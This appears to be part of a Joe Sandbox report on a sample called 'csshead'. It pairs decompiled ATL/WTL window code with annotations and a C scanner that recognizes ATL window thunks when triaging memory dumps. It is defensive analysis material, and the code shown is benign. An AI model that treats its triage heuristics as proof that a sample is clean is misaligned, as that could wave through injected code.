    									_t24 = 0xefda;                               // ID_FILE_MRU_FILE1..16 -> ATL_IDS_MRU_FILE
    								}
    							} else {
    								_t24 = ((_t55 & 0x0000ffff) - 0x0000f000 >> 0x00000004) - 0x00001100 & 0x0000ffff;   // SC_* system command -> ATL_IDS_SCFIRST (0xEF00) + (id - 0xF000) / 16
    							}
    							_t25 =  *0x442b94; // 0x0   (_AtlBaseModule resource instance)
    							_t26 = LoadStringA(_t25, _t24 & 0x0000ffff,  &_v256, 0x100);
    							_t45 = 0;
    							if(_t26 > 0) {
    								while( *((intOrPtr*)(_t60 + _t45 + 0xc)) != 0xa) {   // cut at the first '\n': the text after it is the tooltip, not the status text
    									_t45 = _t45 + 1;
    									if(_t45 < _t26) {
    										continue;
    									} else {
    									}
    									goto L20;
    								}
    								 *((char*)(_t60 + _t45 + 0xc)) = 0;
    							}
    						}
    						L20:
    						SendMessageA( *(_t53 + 0x30), 0x409, 1, 0);               // SB_SIMPLE, TRUE: single-pane mode
    						SendMessageA( *(_t53 + 0x30), 0x401, 0x1ff,  &_v256);     // SB_SETTEXT(SB_SIMPLEID | SBT_NOBORDERS, szBuff)
    						goto L21;
    					} else {
    						SendMessageA(_t18, 0x409, 0, 0);                          // menu closed: SB_SIMPLE, FALSE restores the panes
    						return 1;
    					}
    				}
    			}
    0x0041ff04
    0x0041ff0b
    0x0041ff0d
    0x0041ff13
    0x0041ff18
    0x00420040
    0x0042004c
    0x0041ff1e
    0x0041ff20
    0x0041ff29
    0x0041ff34
    0x0041ff6d
    0x0041ff72
    0x0041ff77
    0x0041ff7d
    0x0041ff88
    0x0041ff8e
    0x0041ffb4
    0x0041ffcf
    0x0041ffdb
    0x0041ffdb
    0x0041ffc0
    0x0041ffc0
    0x0041ffc0
    0x0041ff9a
    0x0041ffa7
    0x0041ffa7
    0x0041ffe8
    0x0041fff4
    0x0041fffa
    0x0041fffe
    0x00420002
    0x00420008
    0x0042000b
    0x00000000
    0x00000000
    0x0042000d
    0x00000000
    0x0042000b
    0x0042000f
    0x0042000f
    0x0041fffe
    0x00420014
    0x00420027
    0x0042003c
    0x00000000
    0x0041ff40
    0x0041ff4a
    0x0041ff5e
    0x0041ff5e
    0x0041ff34

    APIs
    • SendMessageA.USER32(?,00000409,00000000,00000000), ref: 0041FF4A
    • LoadStringA.USER32(00000000,?,?,00000100), ref: 0041FFF4
    • SendMessageA.USER32(?,00000409,00000001,00000000), ref: 00420027
    • SendMessageA.USER32(?,00000401,000001FF,?), ref: 0042003C
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
      • Part of subcall function 004198E0: RtlEnterCriticalSection.NTDLL ref: 0041991C
      • Part of subcall function 004198E0: GetCurrentThreadId.KERNEL32 ref: 00419922
      • Part of subcall function 004198E0: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00419942
      • Part of subcall function 004198E0: InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
      • Part of subcall function 004198E0: ShowWindow.USER32(?,?), ref: 004199EA
    • GetCursorPos.USER32(?), ref: 0041D5B8
    • DragQueryFile.SHELL32(00000000,000000FF,?,00000104), ref: 0041D5E1
    • CreateRectRgnIndirect.GDI32(?), ref: 0041D6AF
    • WaitForSingleObject.KERNEL32(?,00000BB6), ref: 0041D6ED
    • EnableMenuItem.USER32(?,0000000C,00000000), ref: 0041D74B
    • GetDlgItem.USER32(00000000,00442A98), ref: 0041D91F
    • OleInitialize.OLE32(00000000), ref: 0041D929
    • RegisterDragDrop.OLE32(00000000,00442AA0), ref: 0041D93E
    • GetTopWindow.USER32(00000000), ref: 0041D946
    • RevokeDragDrop.OLE32(00000000), ref: 0041D94D
    • OleUninitialize.OLE32 ref: 0041D96B
    • SetMenuItemInfoA.USER32 ref: 0041D9B2
    • GetLastError.KERNEL32 ref: 0041D9BC
    • DrawMenuBar.USER32(00000000), ref: 0041D9C5
    • GetMenuItemInfoA.USER32 ref: 0041D9FA
    • BeginPaint.USER32(00442AA8,?), ref: 0041DA0F
    • EndPaint.USER32(00442AA8,?), ref: 0041DA1E
    • GetClientRect.USER32 ref: 0041DA38
    • EnumDateFormatsA.KERNEL32(?,00000400,00000001), ref: 0041DA4D
    • Sleep.KERNEL32(00442B20,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041DBB9
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			// Editor annotation: matches WTL's CCommandBarCtrl::GetNextMenuItem. Starting at _a4 + 1 and
    			// wrapping to 0, it returns the index of the next top-level menu button that is enabled, not
    			// hidden and fully inside the client area; -1 if it gets back to _a4, -2 if the candidate is
    			// clipped off the right edge. *(this+4) = m_hWnd, *(this+0x44) = m_hMenu,
    			// 0x417 = TB_GETBUTTON, 0x41d = TB_GETITEMRECT, 4 = TBSTATE_ENABLED, 8 = TBSTATE_HIDDEN.
    			E00411530(signed int __eax, void* __ecx, signed int _a4) {
    				signed char _v4;
    				signed char _v8;
    				signed char _v12;            // TBBUTTON.fsState (_v20.._v4 is the 20-byte TBBUTTON)
    				signed char _v16;
    				void* _v20;
    				struct tagRECT _v36;         // rcClient
    				intOrPtr _v40;
    				intOrPtr _v44;               // rcBtn.right (_v52.._v40 is the RECT rcBtn)
    				intOrPtr _v48;
    				void* _v52;
    				signed char _v56;            // top-level menu item count
    				signed char _t38;
    				signed int _t47;
    				void* _t55;
    				int _t57;
    
    				_t47 = _a4;
    				_t55 = __ecx;
    				if(_t47 != 0xffffffff) {
    					_v36.top = 0;
    					_v36.right = 0;
    					_v36.bottom = 0;
    					_v36.left = 0;
    					GetClientRect( *(__ecx + 4),  &_v36);
    					_t38 = GetMenuItemCount( *(_t55 + 0x44));
    					_t57 = _t47 + 1;                                  // nNextItem = nItem + 1
    					_v56 = _t38;
    					if(_t57 == _t47) {
    						L10:
    						return _t38 | 0xffffffff;                      // -1: no usable item
    					} else {
    						L4:                                            // loop head (the decompiler emitted this label twice)
    						if(_t57 >= _v56) {
    							_t57 = 0;                                  // wrap around to the first item
    						}
    						_v16 = 0;
    						_v12 = 0;
    						_v8 = 0;
    						_v4 = 0;
    						_v20 = 0;
    						SendMessageA( *(_t55 + 4), 0x417, _t57,  &_v20);       // TB_GETBUTTON -> tbb
    						_v48 = 0;
    						_v44 = 0;
    						_v40 = 0;
    						_v52 = 0;
    						_t38 = SendMessageA( *(_t55 + 4), 0x41d, _t57,  &_v52);   // TB_GETITEMRECT -> rcBtn
    						if(_v44 > _v36.right) {                         // button extends past the client area
    							goto L11;
    						}
    						_t38 = _v12;
    						if((_t38 & 0x00000004) == 0 || (_t38 & 0x00000008) != 0) {   // disabled or hidden: skip it
    							_t57 = _t57 + 1;
    							if(_t57 != _a4) {
    								goto L4;
    							} else {
    								goto L10;
    							}
    						} else {
    							L12:
    							if(_t57 == _a4) {
    								goto L10;
    							} else {
    								return _t57;
    							}
    						}
    						goto L14;
    						L11:
    						_t57 = 0xfffffffe;                              // -2: next item is clipped
    						goto L12;
    					}
    				} else {
    					return __eax | _t47;                                // nItem == -1 -> -1
    				}
    				L14:
    			}
    0x00411534
    0x00411539
    0x0041153e
    0x00411551
    0x00411555
    0x00411559
    0x00411565
    0x00411569
    0x00411573
    0x00411579
    0x0041157c
    0x00411582
    0x004115ff
    0x00411609
    0x00411584
    0x00000000
    0x00411590
    0x00411594
    0x00411596
    0x00411596
    0x0041159d
    0x004115a1
    0x004115a5
    0x004115a9
    0x004115b9
    0x004115bd
    0x004115c7
    0x004115cb
    0x004115cf
    0x004115dc
    0x004115e0
    0x004115ea
    0x00000000
    0x00000000
    0x004115ec
    0x004115f2
    0x004115f8
    0x004115fd
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00411611
    0x00411611
    0x00411615
    0x00000000
    0x00411617
    0x00411620
    0x00411620
    0x00411615
    0x00000000
    0x0041160c
    0x0041160c
    0x00000000
    0x0041160c
    0x00411541
    0x00411547
    0x00411547
    0x00000000

    APIs
    • GetClientRect.USER32(?,?), ref: 00411569
    • GetMenuItemCount.USER32(?), ref: 00411573
    • SendMessageA.USER32(?,00000417,?,?), ref: 004115BD
    • SendMessageA.USER32(?,0000041D,?,?), ref: 004115E0
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 100%
    			// Editor annotation: matches WTL's CCommandBarCtrl::GetPreviousMenuItem, the mirror of
    			// E00411530 above: it walks downward from _a4 - 1, wrapping to the last item, and returns
    			// the first enabled, non-hidden, unclipped top-level button; -1 if none, -2 if clipped.
    			// Same constants: 0x417 = TB_GETBUTTON, 0x41d = TB_GETITEMRECT, 4 = TBSTATE_ENABLED, 8 = TBSTATE_HIDDEN.
    			E00411440(signed int __eax, void* __ecx, signed int _a4) {
    				signed char _v4;
    				signed char _v8;
    				signed char _v12;            // TBBUTTON.fsState
    				signed char _v16;
    				void* _v20;
    				struct tagRECT _v36;         // rcClient
    				intOrPtr _v40;
    				intOrPtr _v44;               // rcBtn.right
    				intOrPtr _v48;
    				void* _v52;
    				signed char _t36;
    				signed int _t46;
    				void* _t54;
    				int _t56;
    
    				_t46 = _a4;
    				_t54 = __ecx;
    				if(_t46 != 0xffffffff) {
    					_v36.top = 0;
    					_v36.right = 0;
    					_v36.bottom = 0;
    					_v36.left = 0;
    					_t36 = GetClientRect( *(__ecx + 4),  &_v36);
    					_t56 = _t46 - 1;                                  // nPrevItem = nItem - 1
    					if(_t56 == _t46) {
    						L10:
    						return _t36 | 0xffffffff;                      // -1: no usable item
    					} else {
    						L4:                                            // loop head (label emitted twice by the decompiler)
    						if(_t56 < 0) {
    							_t10 = GetMenuItemCount( *(_t54 + 0x44)) - 1; // -1   wrap around to the last item
    							_t56 = _t10;
    						}
    						_v16 = 0;
    						_v12 = 0;
    						_v8 = 0;
    						_v4 = 0;
    						_v20 = 0;
    						SendMessageA( *(_t54 + 4), 0x417, _t56,  &_v20);       // TB_GETBUTTON -> tbb
    						_v48 = 0;
    						_v44 = 0;
    						_v40 = 0;
    						_v52 = 0;
    						_t36 = SendMessageA( *(_t54 + 4), 0x41d, _t56,  &_v52);   // TB_GETITEMRECT -> rcBtn
    						if(_v44 > _v36.right) {                         // button extends past the client area
    							goto L11;
    						}
    						_t36 = _v12;
    						if((_t36 & 0x00000004) == 0 || (_t36 & 0x00000008) != 0) {   // disabled or hidden: skip it
    							_t56 = _t56 - 1;
    							if(_t56 != _a4) {
    								goto L4;
    							} else {
    								goto L10;
    							}
    						} else {
    							L12:
    							if(_t56 == _a4) {
    								goto L10;
    							} else {
    								return _t56;
    							}
    						}
    						goto L14;
    						L11:
    						_t56 = 0xfffffffe;                              // -2: previous item is clipped
    						goto L12;
    					}
    				} else {
    					return __eax | _t46;                                // nItem == -1 -> -1
    				}
    				L14:
    			}
    0x00411444
    0x00411449
    0x0041144e
    0x00411461
    0x00411465
    0x00411469
    0x00411475
    0x00411479
    0x0041147f
    0x00411484
    0x00411508
    0x00411512
    0x0041148a
    0x00000000
    0x00411490
    0x00411492
    0x0041149e
    0x0041149e
    0x0041149e
    0x004114a6
    0x004114aa
    0x004114ae
    0x004114b2
    0x004114c2
    0x004114c6
    0x004114d0
    0x004114d4
    0x004114d8
    0x004114e5
    0x004114e9
    0x004114f3
    0x00000000
    0x00000000
    0x004114f5
    0x004114fb
    0x00411501
    0x00411506
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041151a
    0x0041151a
    0x0041151e
    0x00000000
    0x00411520
    0x00411529
    0x00411529
    0x0041151e
    0x00000000
    0x00411515
    0x00411515
    0x00000000
    0x00411515
    0x00411451
    0x00411457
    0x00411457
    0x00000000

    APIs
    • GetClientRect.USER32(?,?), ref: 00411479
    • GetMenuItemCount.USER32(?), ref: 00411498
    • SendMessageA.USER32(?,00000417,?,?), ref: 004114C6
    • SendMessageA.USER32(?,0000041D,?,?), ref: 004114E9
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • GetMenuItemCount.USER32 ref: 00418EEB
    • DestroyMenu.USER32 ref: 00418F15
    • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 00418F46
    • PtInRect.USER32(00000000,00000000,?), ref: 00418F9D
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 00420A36
    • FlushInstructionCache.KERNEL32(00000000), ref: 00420A3D
    • CreateWindowExA.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00442B90,?), ref: 00420AD1
      • Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
      • Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
      • Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
      • Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
      • Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
    • SetLastError.KERNEL32(0000000E), ref: 00420A57
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			// Editor annotation: matches ATL's CWindowImplBaseT::Create. The block at label L2 is
    			// _stdcallthunk::Init writing the 13-byte x86 window-procedure thunk into the executable
    			// slot at this+0x1c (m_thunk.thunk.pThunk):
    			//   C7 44 24 04 <this>   mov dword ptr [esp+4], this   (swaps the HWND argument for the C++ object)
    			//   E9 <rel32>           jmp WindowProc                (rel32 = proc - (thunk + 13); proc is still
    			//                                                       NULL here, hence the 0xfffffff3 - thunk value)
    			// The PAGE_EXECUTE_READWRITE allocation in L00421F2E (VirtualAlloc flProtect 0x40) and the
    			// FlushInstructionCache call belong to this mechanism. Every ATL/WTL window does it, so a
    			// sandbox flag for "writes and executes heap memory" is expected here and is not on its own
    			// evidence of injection or unpacking.
    			// 0xe = ERROR_OUTOFMEMORY, 0x40000000 = WS_CHILD, 0x440000 = rcDefault, *0x442b90 = _AtlBaseModule.m_hInst.
    			E00420A00(struct HMENU__* __ecx, struct HWND__* _a4, int* _a8, CHAR* _a12, long _a16, long _a20, struct HMENU__* _a24, signed short _a28, void* _a32) {
    				void* _t23;
    				int* _t27;
    				intOrPtr _t33;
    				long _t36;
    				void* _t40;
    				struct HMENU__* _t47;
    				struct HMENU__* _t49;
    				struct HINSTANCE__* _t51;
    				signed short _t56;
    
    				_t49 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x1c)) != 0) {         // pThunk already allocated
    					L2:
    					_t23 =  *(_t49 + 0x1c);                          // pThunk (13 executable bytes)
    					_t40 = 0xfffffff3 - _t23;                        // -(pThunk + 13): rel32 for proc == NULL
    					 *_t23 = 0x42444c7;                              // C7 44 24 04: mov dword ptr [esp+4], imm32
    					 *((intOrPtr*)(_t23 + 4)) = 0;                    // imm32 = this (NULL at this point)
    					 *((char*)(_t23 + 8)) = 0xe9;                     // jmp rel32
    					 *((intOrPtr*)(_t23 + 9)) = 0xfffffff3;           // rel32 placeholder (see _t40)
    					FlushInstructionCache(GetCurrentProcess(), _t23, 0xd);   // 13 = sizeof(_stdcallthunk)
    					_t56 = _a28;                                     // window class atom
    					if(_t56 != 0) {
    						L004080F0(_t40, _t49 + 0x10, _t49);              // _AtlWinModule.AddCreateWndData(&m_thunk.cd, this); the RaiseException(C0000005, ...) in that subcall is AtlThrow on failure
    						_t47 = _a24;
    						_t36 = _a16;
    						if(_t47 == 0 && (_t36 & 0x40000000) != 0) {       // child window without a control ID: use this as the ID
    							_t47 = _t49;
    							_a24 = _t47;
    						}
    						_t27 = _a8;
    						if(_t27 == 0) {
    							_t27 = 0x440000;                             // &rcDefault (CW_USEDEFAULT)
    							_a8 = 0x440000;
    						}
    						_t17 =  &(_t27[1]); // 0x80000000
    						_t51 =  *0x442b90; // 0x0
    						_t19 =  &(_t27[3]); // 0x0
    						_t20 =  &(_t27[2]); // 0x0
    						return CreateWindowExA(_a20, _t56 & 0x0000ffff, _a12, _t36,  *_t27,  *_t17,  *_t20 -  *_t27,  *_t19 -  *_t17, _a4, _t47, _t51, _a32);   // class name = MAKEINTATOM(atom)
    					} else {
    						return 0;                                    // no registered class: Create fails
    					}
    				} else {
    					_t33 = L00421F2E();                               // __AllocStdCallThunk: take an executable 13-byte slot from the RWX pool
    					 *((intOrPtr*)(__ecx + 0x1c)) = _t33;
    					if(_t33 == 0) {
    						SetLastError(0xe);                            // ERROR_OUTOFMEMORY
    						return 0;
    					} else {
    						goto L2;
    					}
    				}
    			}
    0x00420a01
    0x00420a07
    0x00420a15
    0x00420a15
    0x00420a1f
    0x00420a22
    0x00420a28
    0x00420a2f
    0x00420a33
    0x00420a3d
    0x00420a44
    0x00420a4c
    0x00420a6a
    0x00420a6f
    0x00420a73
    0x00420a7c
    0x00420a86
    0x00420a88
    0x00420a88
    0x00420a8c
    0x00420a92
    0x00420a94
    0x00420a99
    0x00420a99
    0x00420aa1
    0x00420aa7
    0x00420ab4
    0x00420ab7
    0x00420adb
    0x00420a4e
    0x00420a52
    0x00420a52
    0x00420a09
    0x00420a09
    0x00420a0e
    0x00420a13
    0x00420a57
    0x00420a60
    0x00000000
    0x00000000
    0x00000000
    0x00420a13

    APIs
    • GetCurrentProcess.KERNEL32 ref: 00420A36
    • FlushInstructionCache.KERNEL32(00000000,?,004099BD,?,?,?,?,?,?,?,?), ref: 00420A3D
    • SetLastError.KERNEL32(0000000E,?,004099BD,?,?,?,?,?,?,?,?), ref: 00420A57
      • Part of subcall function 004080F0: GetCurrentThreadId.KERNEL32 ref: 00408103
      • Part of subcall function 004080F0: EnterCriticalSection.KERNEL32(00442B64), ref: 00408111
      • Part of subcall function 004080F0: LeaveCriticalSection.KERNEL32(00442B64), ref: 0040812A
      • Part of subcall function 004080F0: RaiseException.KERNEL32(C0000005,00000001,00000000,00000000,00000000,80004005), ref: 0040813D
    • CreateWindowExA.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00000000,?), ref: 00420AD1
      • Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,0040892B,00000000,(XC,0043C9F8,?,?,?,?,?,?,00432D40,000000FF), ref: 00421EB2
      • Part of subcall function 00421F2E: HeapAlloc.KERNEL32(00000000,?,?,0040892B,00000000,(XC,0043C9F8,?,?,?,?,?,?,00432D40,000000FF), ref: 00421EB9
      • Part of subcall function 00421F2E: InterlockedPopEntrySList.KERNEL32(00000000,?,?,0040892B,00000000,(XC,0043C9F8,?,?,?,?,?,?,00432D40,000000FF), ref: 00421ECC
      • Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,0040892B,00000000,(XC,0043C9F8), ref: 00421EDD
      • Part of subcall function 00421F2E: InterlockedPopEntrySList.KERNEL32(?,?,0040892B,00000000,(XC,0043C9F8,?,?,?,?,?,?,00432D40,000000FF), ref: 00421EF5
      • Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040892B,00000000,(XC,0043C9F8,?,?,?,?,?,?,00432D40), ref: 00421F05
      • Part of subcall function 00421F2E: InterlockedPushEntrySList.KERNEL32(00000000,?,?,0040892B,00000000,(XC,0043C9F8,?,?,?,?,?,?,00432D40,000000FF), ref: 00421F1C
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
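The thunk that E00420A00 builds can be recognized mechanically when triaging a memory dump, which is the quickest way to decide whether an "executable heap write" in a sample is ATL housekeeping or something else. The C program below is an added example written for this report; it is not code from the sample, from ATL or from Joe Sandbox. It emits the 13-byte layout the decompiled Create() writes, computes the rel32 field the way _stdcallthunk::Init does, and scans a buffer for the pattern to recover the object pointer and the jump target. The addresses in main() are constructed for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Layout of the 13-byte x86 ATL _stdcallthunk that E00420A00 writes at this+0x1c:
 *   C7 44 24 04 <this:le32>   mov dword ptr [esp+4], this
 *   E9 <rel32:le32>           jmp proc      (rel32 is relative to the end of the thunk)
 */
#define ATL_THUNK_SIZE 13u
#define ATL_THUNK_MOV  0x042444C7u   /* the dword the decompiled code stores at +0 */
#define ATL_THUNK_JMP  0xE9u         /* the byte it stores at +8 */

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

static uint32_t get_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Emit the thunk as it would appear at virtual address thunk_va (what _stdcallthunk::Init does).
 * With proc == 0 the rel32 field becomes 0xfffffff3 - thunk_va, the placeholder visible in E00420A00. */
void atl_thunk_build(uint8_t out[ATL_THUNK_SIZE], uint32_t thunk_va, uint32_t this_ptr, uint32_t proc)
{
    put_le32(out, ATL_THUNK_MOV);
    put_le32(out + 4, this_ptr);
    out[8] = ATL_THUNK_JMP;
    put_le32(out + 9, proc - (thunk_va + ATL_THUNK_SIZE));   /* wraps mod 2^32 like the original */
}

/* Triage check: are the 13 bytes at p (mapped at va) an ATL thunk?  Returns 1 and reports the
 * object pointer and the resolved jump target, 0 otherwise. */
int atl_thunk_parse(const uint8_t *p, size_t len, uint32_t va, uint32_t *this_ptr, uint32_t *target)
{
    if (len < ATL_THUNK_SIZE) return 0;
    if (get_le32(p) != ATL_THUNK_MOV || p[8] != ATL_THUNK_JMP) return 0;
    if (this_ptr) *this_ptr = get_le32(p + 4);
    if (target)   *target   = va + ATL_THUNK_SIZE + get_le32(p + 9);
    return 1;
}

/* Scan a dumped region for thunks.  Stores up to max_hits offsets in hits and returns the total.
 * A hit whose jump target lies inside the module's own image is the benign ATL pattern; a target
 * outside every mapped image is what actually deserves attention. */
size_t atl_thunk_scan(const uint8_t *buf, size_t len, size_t *hits, size_t max_hits)
{
    size_t n = 0;
    for (size_t i = 0; i + ATL_THUNK_SIZE <= len; i++) {
        if (atl_thunk_parse(buf + i, len - i, 0, NULL, NULL)) {
            if (n < max_hits) hits[n] = i;
            n++;
        }
    }
    return n;
}

int main(void)
{
    /* Constructed input: a region based at 0x00450010 holding one thunk at offset 7 that points
     * object 0x00442A00 at a WindowProc at 0x00420B00. */
    uint8_t region[32] = {0};
    atl_thunk_build(region + 7, 0x00450017u, 0x00442A00u, 0x00420B00u);

    size_t hits[4];
    size_t n = atl_thunk_scan(region, sizeof region, hits, 4);
    uint32_t this_ptr = 0, target = 0;
    if (n == 1 && atl_thunk_parse(region + hits[0], sizeof region - hits[0], 0x00450017u, &this_ptr, &target))
        printf("thunk at +%zu: this=0x%08x -> proc=0x%08x\n", hits[0], this_ptr, target);
    return 0;
}
```

Run the scanner over the 0x401000 region of the first snapshot and over the VirtualAlloc'ed RWX pages: the thunks found should all jump into the image (the ATL WindowProc), and their `this` values should be heap objects. A thunk whose target is outside every loaded module would be the first thing to look at.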
    APIs
    • SendMessageA.USER32(?,00000229,00000000,00000000), ref: 004202D1
    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0042034C
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137), ref: 00420365
    • GetClientRect.USER32(?,?), ref: 00420378
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 93%
    			// Editor annotation: matches the WTL AppWizard's CMainFrame::OnViewToolBar. The global at
    			// 0x441340 is the "toolbar visible" flag; it is flipped, the rebar band is shown or hidden,
    			// the menu check mark is updated and the client view is re-laid out (UpdateLayout).
    			// 0x410 = RB_IDTOINDEX, 0xeb01 = ATL_IDW_BAND_FIRST + 1, 0x423 = RB_SHOWBAND, 0xe800 = ID_VIEW_TOOLBAR,
    			// *(this+0x2c) = m_hWndToolBar (rebar), *(this+0x34) = m_hWndClient, 0x14 = SWP_NOZORDER | SWP_NOACTIVATE.
    			// The decompiler placed the RECT 8 bytes too low: _v28.right, _v28.bottom, _v12 and _v8 are
    			// rect.left, rect.top, rect.right and rect.bottom in the SetWindowPos call.
    			E0041E750(void* __ecx) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				struct tagRECT _v28;
    				int _t19;
    				long _t31;
    				long _t38;
    				struct HWND__* _t42;
    				void* _t43;
    				struct HWND__* _t44;
    				long _t46;
    
    				_t46 =  *0x441340; // 0x1
    				_t43 = __ecx;
    				_t42 =  *(__ecx + 0x2c);                                  // rebar hosting the toolbar band
    				 *0x441340 = 0 | _t46 == 0x00000000;                       // bVisible = !bVisible
    				_t19 = SendMessageA(_t42, 0x410, 0xeb01, 0);               // nBandIndex = rebar.IdToIndex(ATL_IDW_BAND_FIRST + 1)
    				_t31 =  *0x441340; // 0x1
    				SendMessageA(_t42, 0x423, _t19, _t31);                     // rebar.ShowBand(nBandIndex, bVisible)
    				_t38 =  *0x441340; // 0x1
    				L0041E230(_t43 + 0x54, 0xe800, _t38, 0);                   // UISetCheck(ID_VIEW_TOOLBAR, bVisible)
    				_v28.top = 0;
    				_v28.right = 0;
    				_v28.bottom = 0;
    				_v28.left = 0;
    				GetClientRect( *(_t43 + 4),  &_v28);
    				_push(1);
    				L00418760(_t43,  &_v28);                                   // UpdateBarsPosition(rect, TRUE): shrinks rect by the bars
    				_t44 =  *(_t43 + 0x34);                                    // m_hWndClient
    				if(_t44 != 0) {
    					SetWindowPos(_t44, 0, _v28.right, _v28.bottom, _v12 - _v28.right, _v8 - _v28.bottom, 0x14);   // fit the view into the remaining rect
    				}
    				return 0;
    			}
    0x0041e75d
    0x0041e76e
    0x0041e770
    0x0041e779
    0x0041e77e
    0x0041e780
    0x0041e78e
    0x0041e790
    0x0041e7a1
    0x0041e7ab
    0x0041e7af
    0x0041e7b3
    0x0041e7bd
    0x0041e7c5
    0x0041e7cb
    0x0041e7d4
    0x0041e7d9
    0x0041e7de
    0x0041e7fd
    0x0041e7fd
    0x0041e80b

    APIs
    • SendMessageA.USER32(?,00000410,0000EB01,00000000), ref: 0041E77E
    • SendMessageA.USER32(?,00000423,00000000,00000001), ref: 0041E78E
    • GetClientRect.USER32(?,?), ref: 0041E7C5
      • Part of subcall function 00418760: GetWindowLongA.USER32(?,000000F0), ref: 0041877C
      • Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 00418796
      • Part of subcall function 00418760: InvalidateRect.USER32(?,00000000,00000001), ref: 004187A4
      • Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 004187C9
      • Part of subcall function 00418760: GetWindowLongA.USER32(?,000000F0), ref: 004187E4
      • Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 004187FE
      • Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 00418823
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?,00000014), ref: 0041E7FD
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
